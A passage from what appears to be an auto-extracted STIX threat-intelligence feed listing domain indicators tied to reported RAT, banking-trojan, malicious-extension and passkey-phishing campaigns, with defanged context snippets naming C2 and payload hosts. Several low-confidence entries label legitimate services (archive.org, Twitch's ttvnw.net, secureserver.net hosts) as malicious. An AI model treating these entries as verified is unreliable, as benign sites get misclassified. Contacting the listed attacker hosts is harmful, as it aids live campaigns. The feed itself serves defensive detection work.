News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--31ade193-2c56-4e89-985f-4d7ce5116f54","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: needcherries.online","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]online OfferLoader installation-tracker infrastructure Domain ve","pattern":"[domain-name:value = 'needcherries.online']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bbfe380c-71f3-4911-9c2d-99200ea711fa","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: noiseship.cfd","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: earch hijacking, callback, and script infrastructure Domain noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]co","pattern":"[domain-name:value = 'noiseship.cfd']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f94496b2-9cb8-4439-9186-7a20426a060d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: pcsdkflyer.ca","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ia RAT stage hosts and Python-agent C2 typosquat Domain reg.pcsdkflyer[.]ca ARKTunnel WebSocket RAT C2 server Domain vendralo[.]info","pattern":"[domain-name:value = 'pcsdkflyer.ca']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3829d8d9-3d3d-4791-8ca7-70d55aa084ef","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: placespoon.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]online OfferLoader installation-tracker","pattern":"[domain-name:value = 'placespoon.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c31ab138-d873-4c91-a7d6-07a01e6fcd8f","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: statementtouch.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ake file-hosting infrastructure Domain voyagemist[.]space ; statementtouch[.]xyz ; chawton[.]info OfferLoader payload handoff and second-s","pattern":"[domain-name:value = 'statementtouch.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--296d0517-4597-4396-8fb1-dfc5a3dca34b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: stryper.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: cro\\ Docro Chrome extension installation path URL hxxps[:]//stryper[.]info/t.ps1 Stage-two PowerShell installer for Insomnia RAT URL","pattern":"[domain-name:value = 'stryper.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c134f3e2-1c9c-49b6-aa4d-5a304e5b6a2b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: suitstraw.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: nd-stage hosts Domain animalview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[","pattern":"[domain-name:value = 'suitstraw.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e4739bf5-17e2-4c73-8bb7-26397010012a","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: trickflag.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ad handoff and second-stage hosts Domain animalview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsyste","pattern":"[domain-name:value = 'trickflag.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6b6953f6-8463-4526-996a-372938d3a90c","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: vendralo.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: eg.pcsdkflyer[.]ca ARKTunnel WebSocket RAT C2 server Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; dr","pattern":"[domain-name:value = 'vendralo.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--516dd073-7e94-4799-baae-805dd863ba97","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: venrx.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ot[.]com ; venrx.blogspot[.]com ; venrxhub.blogspot[.]com ; venrx[.]xyz ; ravexoffical.blogspot[.]com ; adex-blog.blogspot[.]com","pattern":"[domain-name:value = 'venrx.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7c97e5ea-dd3b-42c0-b549-599bf0052e68","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: vesselsystem.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ckflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]inf","pattern":"[domain-name:value = 'vesselsystem.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b2c40fe8-3492-4e9d-ae17-378a2e942632","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: voyagemist.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: s SEO-poisoning and fake file-hosting infrastructure Domain voyagemist[.]space ; statementtouch[.]xyz ; chawton[.]info OfferLoader paylo","pattern":"[domain-name:value = 'voyagemist.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1e516d64-c763-4a18-9d3b-0d6ecfd0f173","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: watchadvance.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: x[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watchadvance[.]com Initial-access SEO-poisoning and fake file-hosting infras","pattern":"[domain-name:value = 'watchadvance.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e6ea52c3-f6cc-4abf-a944-4e6f0aef23ad","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: xrsdownload.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watchadvance[.]com Initial-ac","pattern":"[domain-name:value = 'xrsdownload.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9d51dbb6-06ba-4d42-b0f7-92098547e76f","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: zippyfiles.net","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: filexspace[.]com ; filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclic","pattern":"[domain-name:value = 'zippyfiles.net']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d4fccd26-04ca-4893-ba16-7cf9c9d5bac0","created":"2026-09-14T07:24:39.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: ttvnw.net","description":"Seen in \"Malicious Twitch Browser Extension Leaks OAuth Tokens From Nearly 31,000 Users\" (The Hacker News). Context: es so by routing Twitch's video-playlist requests to \"usher.ttvnw[.]net\" through operator-controlled proxy servers along with the","pattern":"[domain-name:value = 'ttvnw.net']","pattern_type":"stix","valid_from":"2026-09-14T07:24:39.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/malicious-twitch-browser-extension.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--09f4f28f-c02e-4472-a015-a354db19c8b7","created":"2026-09-14T05:56:58.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: 128.200.178.68.host.secureserver.net","description":"Seen in \"Casbaneiro Banking Trojan Uses Distributed C2 Servers to Evade Detection and Target Bank Users\" (GBHackers). Context: 94ad5dcd271aa86f08cb2b8374203ecc67015af7ca6057244390 Domain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Domain 13[.]189[.]202[.]64[.]host[.]secureserve","pattern":"[domain-name:value = '128.200.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T05:56:58.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9f55e5b6-28ed-4701-bea8-9ec66497bf96","created":"2026-09-14T05:56:58.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: 13.189.202.64.host.secureserver.net","description":"Seen in \"Casbaneiro Banking Trojan Uses Distributed C2 Servers to Evade Detection and Target Bank Users\" (GBHackers). Context: ain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Domain 13[.]189[.]202[.]64[.]host[.]secureserver[.]net IP address 72[.]167[.]48[.]63 IP address 209[.]","pattern":"[domain-name:value = '13.189.202.64.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T05:56:58.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--eaa40d51-cdbb-4857-883a-ed37880ffd23","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: archive.org","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: 35a1ca0987/{campaignId} .NET PE Injector sub-module hxxps://archive[.]org/download/hotelmoskva/hotelmoskva.jpg SentinelMemoryScanne","pattern":"[domain-name:value = 'archive.org']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--03af27c1-65e7-4636-929e-0d662d526b13","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: connection.upgradeonline.site","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: passing the campaign ID. In this sample, the URL is hxxps://connection[.]upgradeonline[.]site . Loader beacons to C2 Second stage: persistence and th","pattern":"[domain-name:value = 'connection.upgradeonline.site']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bf9cc490-c8f8-4b40-a286-53c8f6adf371","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: granderevolucao.store","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: licious browser extension installer payload main-v2 hxxps://granderevolucao[.]store/5c92d3b8734b4f498752f735a1ca0987/{campaignId} .NET PE Inj","pattern":"[domain-name:value = 'granderevolucao.store']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e2def636-f341-472a-96f8-dee25cf228d8","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: ia601808.us.archive.org","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: legit SentinelOne binary for side-loading sentinel hxxps://ia601808[.]us[.]archive[.]org/5/items/sentinel_20260722_0435/Sentinel.jpg After the","pattern":"[domain-name:value = 'ia601808.us.archive.org']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f81280de-8160-451e-ab4b-edd7966692fd","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: volmira.site","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: abA6740d07b . The extension and main-v2 parameters returned volmira[.]site and zaviro[.]online , respectively. Notably, the main-v2","pattern":"[domain-name:value = 'volmira.site']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--faed9894-01c4-4058-95ca-141f37066885","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: www.creamp1eonlyfans.net","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: ting to download a page from the unregistered domain hxxp://www[.]creamp1eonlyfans[.]net . Because this domain should not return any content, a","pattern":"[domain-name:value = 'www.creamp1eonlyfans.net']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e0b46434-5022-4e86-858d-fade09136d94","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: zaviro.online","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: xtension and main-v2 parameters returned volmira[.]site and zaviro[.]online , respectively. Notably, the main-v2 value was updated on","pattern":"[domain-name:value = 'zaviro.online']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3617074e-a197-4bc4-a6d8-7e29a9b0a8af","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: add-passkey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: keyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com por","pattern":"[domain-name:value = 'add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--502fcfb3-7fdb-4bf7-9d29-b9fd77eddb55","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: domainlify.net","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: of the registered domains are below - service-nowinc[.]com domainlify[.]net Passkey-Themed Social Engineering Leads to Cloud Compromi","pattern":"[domain-name:value = 'domainlify.net']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bc16f1fb-a285-4179-854c-072e2dd40915","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: integratedsso.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It","pattern":"[domain-name:value = 'integratedsso.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--12f5f040-09f9-4292-ad64-26665f6ee164","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: oktasession.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It's worth noting th","pattern":"[domain-name:value = 'oktasession.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--35b664e0-a987-4dd6-ac94-5376e84eb63c","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: passkeyhelpdesk.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: in the pattern: \"<company name>.<malicious domain>[.]com\" - passkeyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]c","pattern":"[domain-name:value = 'passkeyhelpdesk.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8b1d8f24-b05e-47d2-99d8-e65b06c817e8","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: portalsetuphub.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: .]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It's worth noting that this modus operandi overlaps with","pattern":"[domain-name:value = 'portalsetuphub.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--80616c26-667d-4124-bbfe-3e25de908156","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: secure-passkey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: any name>.<malicious domain>[.]com\" - passkeyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]co","pattern":"[domain-name:value = 'secure-passkey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ca56df5a-aa85-432c-b0c7-94a8064f9de0","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: service-nowinc.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: and individuals. Some of the registered domains are below - service-nowinc[.]com domainlify[.]net Passkey-Themed Social Engineering Leads","pattern":"[domain-name:value = 'service-nowinc.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--81779148-b9da-4ff4-9270-6346143db61e","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: setupmypasskey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: domain>[.]com\" - passkeyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com s","pattern":"[domain-name:value = 'setupmypasskey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6cc23e92-d25d-4ce2-aebb-3c4bac0f312d","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: syncmykey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It's worth noting that this modus op","pattern":"[domain-name:value = 'syncmykey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--34c9cbe0-2be4-410b-8fa1-6f19c5c16261","created":"2026-09-12T10:24:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: gemini-advertisers.com","description":"Seen in \"When the Whole Company Adopts AI: What It Does to Your SOC\" (The Hacker News). Context: iated with Google and instead rely on the suspicious domain gemini-advertisers[.]com, indicating a brand impersonation attempt designed to dri","pattern":"[domain-name:value = 'gemini-advertisers.com']","pattern_type":"stix","valid_from":"2026-09-12T10:24:44.000Z","labels":["auto-extracted","research"],"confidence":30,"external_references":[{"source_name":"The Hacker 